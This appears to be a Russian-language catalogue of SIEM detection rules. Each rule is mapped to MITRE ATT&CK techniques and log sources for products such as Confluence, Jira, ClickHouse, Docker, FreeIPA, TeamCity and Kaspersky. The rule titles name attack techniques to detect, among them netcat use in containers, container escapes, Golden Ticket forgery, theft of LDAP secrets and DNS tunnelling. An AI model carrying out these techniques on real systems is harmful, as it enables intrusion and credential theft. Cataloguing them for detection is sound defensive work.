TA0005 (Defense Evasion)

T1562 (Impair Defenses)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-28

Эксплуатация уязвимости в Confluence - CVE-2023-22515

TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution)

T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-29

Эксплуатация уязвимости в Confluence - CVE-2023-22518

TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution)

T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-30

Эксплуатация уязвимости в Confluence - CVE-2023-22527

TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution)

T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-31

Выполнение OGNL-инъекции через Java-выражения в Confluence

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-32

Создание множества страниц Confluence

TA0040 (Impact)

T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation), T1491 (Defacement), T1491.001 (Defacement: Internal Defacement), T1491.002 (Defacement: External Defacement)

confluence_access.log, access.log

Atlassian

Jira

RV-D-70

Создание резервной копии Jira

TA0009 (Collection), TA0040 (Impact)

T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Atlassian

Jira

RV-D-71

Дамп множества задач в Jira

TA0009 (Collection), TA0040 (Impact)

T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Atlassian

Jira

RV-D-72

Экспорт множества задач в Jira

TA0009 (Collection), TA0040 (Impact)

T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Atlassian

Jira

RV-D-73

Множество неудачных попыток входа в Jira

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Atlassian

Jira

RV-D-74

Изменение конфигурации журналов логирования в Jira

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Atlassian

Jira

RV-D-75

Создание множества задач пользователем в Jira

TA0040 (Impact)

T1499 (Endpoint Denial of Service), T1499.003 (Endpoint Denial of Service: Application Exhaustion Flood), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Atlassian

Jira

RV-D-76

Удаление множества задач пользователем в Jira

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Atlassian

Jira

RV-D-77

Создание пользователя в Jira

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

Atlassian

Jira

RV-D-78

Добавление пользователя в критичные группы

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

Atlassian

Jira

RV-D-482

Эксплуатация уязвимости в Jira - CVE-2023-26256

TA0007 (Discovery), TA0001 (Initial Access), TA0005 (Defense Evasion), TA0006 (Credential Access), TA0009 (Collection)

T1083 (File and Directory Discovery), T1190 (Exploit Public-Facing Application), T1211 (Exploitation for Defense Evasion), T1212 (Exploitation for Credential Access), T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1552 (Unsecured Credentials), T1552.008 (Unsecured Credentials: Chat Messages)

Cisco

ASA

RV-D-5

Успешный подбор пароля в привилегированный режим Cisco ASA

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Syslog (EventID_308001, EventID_502103)

Cisco

ASA

RV-D-6

Подбор пароля через SSH к Cisco ASA

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Syslog (EventID_113015)

Cisco

ASA

RV-D-7

Успешный подбор пароля через SSH к Cisco ASA

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Syslog (EventID_113012, EventID_113015)

Cisco

ASA

RV-D-8

Доступ к привилегированному режиму после авторизации

TA0004 (Privilege Escalation)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

Syslog (EventID_113012, EventID_502103)

Cisco

IOS

RV-D-1

Подбор пароля к устройству на Cisco IOS методом Password Spraying

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Syslog (Login failed)

Cisco

IOS

RV-D-2

Успешный подбор пароля к устройству c ОС Cisco IOS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Syslog (Login failed, Login success)

Cisco

IOS

RV-D-3

Подбор пароля к устройству c ОС Cisco IOS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Syslog (Login failed)

Cisco

IOS

RV-D-4

Вход привилегированного пользователя на устройство c ОС Cisco IOS с неизвестного хоста

TA0006 (Credential Access), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts)

Syslog (Login success)

ClickHouse

RV-D-9

Использование LIKE для разведки в Clickhouse

TA0009 (Collection)

T1005 (Data from Local System)

ClickHouse

RV-D-10

Подбор пароля к СУБД ClickHouse

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

ClickHouse

RV-D-11

Изменение конфигурации базы данных ClickHouse

TA0003 (Persistence), TA0005 (Defense Evasion), TA0007 (Discovery), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1087 (Account Discovery), T1556 (Modify Authentication Process), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

ClickHouse

RV-D-12

Небезопасный способ аутентификации пользователя ClickHouse

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0006 (Credential Access)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1552 (Unsecured Credentials)

ClickHouse

RV-D-13

Создание дампа таблиц в ClickHouse

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)

ClickHouse

RV-D-14

Атака Password Spraying на СУБД ClickHouse

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

ClickHouse

RV-D-15

Вход привилегированного пользователя в базу данных ClickHouse с неизвестного хоста

TA0006 (Credential Access), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

ClickHouse

RV-D-16

Успешный подбор пароля к СУБД ClickHouse

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

ClickHouse

RV-D-17

Изменение или удаление таблицы аудита ClickHouse

TA0005 (Defense Evasion), TA0040 (Impact)

T1070 (Indicator Removal), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

ClickHouse

RV-D-18

Взаимодействие с файловой системой из БД ClickHouse

TA0002 (Execution), TA0007 (Discovery), TA0040 (Impact)

T1059 (Command and Scripting Interpreter), T1059.006 (Command and Scripting Interpreter: Python), T1083 (File and Directory Discovery), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

ClickHouse

RV-D-19

Получение информации о системе в ClickHouse

TA0007 (Discovery)

T1082 (System Information Discovery), T1083 (File and Directory Discovery)

ClickHouse

RV-D-20

Получение информации о структуре Clickhouse

TA0006 (Credential Access), TA0007 (Discovery)

T1003 (OS Credential Dumping), T1069 (Permission Groups Discovery), T1069.001 (Permission Groups Discovery: Local Groups), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account)

ClickHouse

RV-D-21

Попытка удаления базы данных в ClickHouse

TA0040 (Impact)

T1485 (Data Destruction)

ClickHouse

RV-D-22

Попытка удаления нескольких таблиц в ClickHouse

TA0040 (Impact)

T1485 (Data Destruction)

ClickHouse

RV-D-23

Создание привилегированного пользователя в ClickHouse

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

Docker

Docker Desktop

RV-D-33

Использование debugs в контейнере

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-34

Вызов процесса netcat в контейнере

TA0002 (Execution), TA0004 (Privilege Escalation)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-35

Вызов процесса из /dev/shm в контейнере

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-36

Вызов интерактивного шелла в контейнере

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-37

Вызов kubectl в контейнере

TA0004 (Privilege Escalation)

T1609 (Container Administration Command), T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-38

Вызов mknod в контейнере

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-39

Вызов mount в контейнере

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-40

Обращение к сокет-файлу Docker из контейнера

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-41

Доступ к release_agent из контейнера

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Docker

Docker Desktop

RV-D-42

Попытка эксплуатации уязвимости runc

TA0004 (Privilege Escalation)

T1611 (Escape to Host)

R-Point

Eltex

vESR

RV-D-43

Подбор пароля к маршрутизатору Eltex vESR методом Password Spraying

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Eltex

vESR

RV-D-44

Успешный подбор пароля к маршрутизатору Eltex vESR

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Eltex

vESR

RV-D-45

Подбор пароля к маршрутизатору Eltex vESR

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Eltex

vESR

RV-D-46

Вход привилегированного пользователя на маршрутизатор Eltex vESR с неизвестного хоста

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

FreeIPA

RV-D-47

Чтение Ticket CCACHE файла

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.005 (Steal or Forge Kerberos Tickets: Ccache Files)

Auditd

FreeIPA

RV-D-48

Атака Golden Ticket FreeIPA

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)

Auditd

FreeIPA

RV-D-49

Выполнение бэкапа FreeIPA

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)

Auditd

FreeIPA

RV-D-50

Успешный подбор пароля пользователя FreeIPA

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

KRB5KDC

FreeIPA

RV-D-51

Чтение LDAP-секретов FreeIPA

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)

Auditd

FreeIPA

RV-D-52

Атака Silver Ticket FreeIPA

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.002 (Steal or Forge Kerberos Tickets: Silver Ticket), T1558.005 (Steal or Forge Kerberos Tickets: Ccache Files)

Auditd

FreeIPA

RV-D-53

Подбор пароля пользователя FreeIPA

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

KRB5KDC

FreeIPA

RV-D-54

Использование утилиты kadmin

TA0003 (Persistence)

T1003 (OS Credential Dumping), T1098 (Account Manipulation), T1134 (Access Token Manipulation), T1543 (Create or Modify System Process)

Auditd

FreeIPA

RV-D-55

Разведка пользователей/ролей IPA

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

error_log

FreeIPA

RV-D-56

Изменение оболочки входа средствами FreeIPA

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)

error_log

FreeIPA

RV-D-57

Остановка/перезапуск сервисов FreeIPA

TA0040 (Impact)

T1489 (Service Stop)

Auditd

FreeIPA

RV-D-58

Изменение конфигураций FreeIPA через API

TA0003 (Persistence)

T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)

error_log

FreeIPA

RV-D-59

Изменение файлов управления FreeIPA

TA0003 (Persistence)

T1036 (Masquerading), T1574 (Hijack Execution Flow)

Auditd

FreeIPA

RV-D-60

Изменение конфигураций разрешений в FreeIPA

TA0003 (Persistence)

T1098 (Account Manipulation), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)

error_log

FreeIPA

RV-D-61

Изменение конфигураций привилегий в FreeIPA

TA0003 (Persistence)

T1098 (Account Manipulation), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)

error_log

FreeIPA

RV-D-62

Изменение конфигураций ролей в FreeIPA

TA0003 (Persistence)

T1098 (Account Manipulation)

error_log

FreeIPA

RV-D-63

Изменение конфигурации сервера FreeIPA

TA0003 (Persistence)

T1003 (OS Credential Dumping), T1136 (Create Account), T1136.002 (Create Account: Domain Account), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)

Auditd

FreeIPA

RV-D-64

Изменение конфигурации сервера kerberos

TA0003 (Persistence)

T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication)

Auditd

FreeIPA

RV-D-65

Изменение конфигурации сервера ldap

TA0003 (Persistence)

T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication), T1558 (Steal or Forge Kerberos Tickets)

Auditd

FreeIPA

RV-D-66

Изменение конфигурации sudo в FreeIPA

TA0004 (Privilege Escalation)

T1548 (Abuse Elevation Control Mechanism), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching)

error_log

FreeIPA

RV-D-67

Добавление HBAC-правила через FreeIPA

TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

error_log

GitHub

RV-D-68

Эксплуатация уязвимости в GitHub Enterprise Server - CVE-2024-0507

TA0002 (Execution), TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)

haproxy.log, access.log

InfoWatch

Traffic Monitor

RV-D-609

Атака Brute Force к InfoWatch TM

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-610

Отключение политики аудита InfoWatch TM

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-611

Массовое удаление УЗ InfoWatch TM

TA0040 (Impact)

T1531 (Account Access Removal)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-612

Создание администратора в InfoWatch TM

TA0003 (Persistence)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.003 (Valid Accounts: Local Accounts), T1136 (Create Account), T1136.001 (Create Account: Local Account)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-613

Создание роли администратора в InfoWatch TM

TA0003 (Persistence)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-614

Успешная атака Brute Force к InfoWatch TM

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-615

Password Spraying в InfoWatch TM

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

arc_view_audit_log

InfoWatch

Traffic Monitor

RV-D-616

Вход администратора на InfoWatch TM

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts)

arc_view_audit_log

Internet Systems Consortium

BIND

RV-D-636

Множественные DNS-запросы с одного устройства

TA0010 (Exfiltration)

T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS)

queries.log

Internet Systems Consortium

BIND

RV-D-638

Обнаружен DNS-запрос к ресурсам Telegram API

TA0011 (Command and Control), TA0010 (Exfiltration)

queries.log

Internet Systems Consortium

BIND

RV-D-639

Обнаружен DNS-запрос к пулам Monero

TA0040 (Impact)

T1496 (Resource Hijacking), T1496.001 (Resource Hijacking: Compute Hijacking)

queries.log

Internet Systems Consortium

BIND

RV-D-640

Обнаружен DNS-запрос к подозрительным внешним службам

TA0001 (Initial Access), TA0043 (Reconnaissance)

T1190 (Exploit Public-Facing Application), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)

queries.log

Internet Systems Consortium

BIND

RV-D-643

Передача зоны DNS на недоверенный узел (AXFR)

TA0043 (Reconnaissance)

T1590 (Gather Victim Network Information), T1590.002 (Gather Victim Network Information: DNS)

default.log

Internet Systems Consortium

BIND

RV-D-644

Обнаружен DNS-запрос к Killswitch-домену WannaCry

TA0002 (Execution)

T1204 (User Execution), T1204.002 (User Execution: Malicious File)

queries.log

Internet Systems Consortium

BIND

RV-D-647

Использование DNS-туннеля

TA0010 (Exfiltration), TA0011 (Command and Control)

queries.log

Internet Systems Consortium

BIND

RV-D-730

Обнаружен DNS-запрос к домену localtonet

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

queries.log

JetBrains

TeamCity

RV-D-69

Эксплуатация уязвимости в JetBrains TeamCity - CVE-2024-27198

TA0004 (Privilege Escalation), TA0005 (Defense Evasion), TA0003 (Persistence), TA0001 (Initial Access)

T1068 (Exploitation for Privilege Escalation), T1134 (Access Token Manipulation), T1134.003 (Access Token Manipulation: Make and Impersonate Token), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1212 (Exploitation for Credential Access)

access.log

JetBrains

TeamCity

RV-D-551

Вход привилегированного пользователя в TeamCity с неизвестного хоста

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

teamcity-auth.log

JetBrains

TeamCity

RV-D-552

Успешный подбор пароля к JetBrains TeamCity

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

teamcity-server.log, teamcity-auth.log

JetBrains

TeamCity

RV-D-553

Подбор пароля к JetBrains TeamCity

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

teamcity-server.log

JetBrains

TeamCity

RV-D-554

Получение авторизационного токена TeamCity

TA0003 (Persistence), TA0006 (Credential Access)

T1528 (Steal Application Access Token)

teamcity-activities.log

JetBrains

TeamCity

RV-D-555

Загрузка плагина TeamCity

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1195 (Supply Chain Compromise), T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools), T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1505 (Server Software Component: Web Shell)

teamcity-server.log

JetBrains

TeamCity

RV-D-556

Создание учетной записи TeamCity

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

teamcity-server.log

JetBrains

TeamCity

RV-D-557

Изменение состава или роли группы

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

teamcity-activities.log

JetBrains

TeamCity

RV-D-558

Включена возможность удаленного выполнения команд

TA0002 (Execution), TA0004 (Privilege Escalation), TA0011 (Command and Control)

T1059 (Command and Scripting Interpreter), T1068 (Exploitation for Privilege Escalation), T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication), T1190 (Exploit Public-Facing Application)

access.log

JetBrains

TeamCity

RV-D-559

Изменение конфигурации сборки под подозрительной УЗ

TA0008 (Lateral Movement)

T1021 (Remote Services)

teamcity-activities.log

JetBrains

TeamCity

RV-D-658

Эксплуатация CVE-2023-42793 в JetBrains TeamCity

TA0002 (Execution), TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation), T1134 (Access Token Manipulation), T1134.003 (Access Token Manipulation: Make and Impersonate Token), T1190 (Exploit Public-Facing Application), T1195 (Supply Chain Compromise), T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools), T1210 (Exploitation of Remote Services), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)

access.log

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-664

Вредоносное вложение в письме

TA0001 (Initial Access), TA0043 (Reconnaissance)

T1534 (Internal Spearphishing), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1598 (Phishing for Information), T1598.002 (Phishing for Information: Spearphishing Attachment)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT, LMS_EV_SCAN_LOGIC_AV_STATUS)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-665

Вредоносная ссылка в письме

TA0001 (Initial Access)

T1189 (Drive-by Compromise), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1566 (Phishing), T1566.002 (Phishing: Spearphishing Link), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_URL)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-666

Проверка подлинности отправителя сообщений

TA0001 (Initial Access)

T1534 (Internal Spearphishing), T1566 (Phishing), T1598 (Phishing for Information)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-667

Получение массовой рассылки писем

TA0001 (Initial Access)

T1566 (Phishing), T1598 (Phishing for Information), T1667 (Email Bombing)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_AS_STATUS)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-668

Получение спам-письма

TA0001 (Initial Access)

T1566 (Phishing), T1598 (Phishing for Information)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_AS_STATUS)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-669

Шифрованное вложение в письме

TA0001 (Initial Access)

T1027 (Obfuscated Files or Information), T1534 (Internal Spearphishing), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1598 (Phishing for Information), T1598.002 (Phishing for Information: Spearphishing Attachment)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT, LMS_EV_SCAN_LOGIC_AV_STATUS)

Kaspersky

Kaspersky Security Center

RV-DD-1

Успешное исполнение задачи на удаленную установку программы средствами KSC через установочные пакеты

TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLPRCI_TaskState, KLNAG_EV_INV_APP_INSTALLED, KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-83

Критичная политика была изменена Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-84

Повторное заражение хоста одним вирусом

TA0008 (Lateral Movement), TA0002 (Execution)

T1080 (Taint Shared Content), T1204 (User Execution), T1204.002 (User Execution: Malicious File), T1204.003 (User Execution: Malicious Image), T1210 (Exploitation of Remote Services)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND)

Kaspersky

Kaspersky Security Center

RV-D-85

Устройство перемещено в группу администрирования на сервере KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_ADMGROUP_CHANGED)

Kaspersky

Kaspersky Security Center

RV-D-86

Зафиксировано отключение задачи средств AV-защиты Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (EventID_000000de)

Kaspersky

Kaspersky Security Center

RV-D-87

На сервере KSC созданы пакет установки и удаленная задача на установку пакета

TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-89

Изменение политик администрирования на сервере KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-90

Отключение продукта Kaspersky в результате выполнения задачи

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLPRCI_TaskState)

Kaspersky

Kaspersky Security Center

RV-D-91

Отключение компонентов защиты продуктов Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (EventID_000000d6)

Kaspersky

Kaspersky Security Center

RV-D-92

Создание и исполнение задачи на удаленную деинсталляцию программы средствами KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY, KLAUD_EV_TASK_STATE_CHANGED)

Kaspersky

Kaspersky Security Center

RV-D-93

Успешное исполнение задачи на удаленную установку программы средствами KSC

TA0005 (Defense Evasion), TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLPRCI_TaskState, KLNAG_EV_INV_APP_INSTALLED)

Kaspersky

Kaspersky Security Center

RV-D-94

Зафиксирован переход по опасной ссылке

TA0002 (Execution), TA0043 (Reconnaissance)

T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link), T1608 (Stage Capabilities), T1608.005 (Stage Capabilities: Link Target)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND_AND_REPORTED, GNRL_EV_VIRUS_FOUND_AND_BLOCKED)

Kaspersky

Kaspersky Security Center

RV-D-95

Множество хостов заражены одним типом ВПО

TA0042 (Resource Development)

T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN)

Kaspersky

Kaspersky Security Center

RV-D-96

Множественное срабатывание вердиктов средств AV-защиты на одном хосте

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN)

Kaspersky

Kaspersky Security Center

RV-D-97

Зафиксирована сетевая атака

TA0043 (Reconnaissance)

T1595 (Active Scanning), T1595.001 (Active Scanning: Scanning IP Blocks)

Kaspersky Security Center (GNRL_EV_ATTACK_DETECTED)

Kaspersky

Kaspersky Security Center

RV-D-98

Зафиксированы устаревшие базы антивирусного ПО Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (EventID_000000cf, EventID_000000d0)

Kaspersky

Kaspersky Security Center

RV-D-99

Включение учетной записи пользователя на сервере KSC

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

Kaspersky Security Center (KLAUD_EV_OBJECTPROPMODIFIED)

Kaspersky

Kaspersky Security Center

RV-D-100

Было удалено обнаруженное средствами AV-защиты ВПО

TA0042 (Resource Development)

T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN, GNRL_EV_OBJECT_DELETED, GNRL_EV_OBJECT_CURED, GNRL_EV_OBJECT_BLOCKED)

Kaspersky

Kaspersky Security Center

RV-D-101

Не было удалено обнаруженное средствами AV-защиты ВПО

TA0042 (Resource Development)

T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)

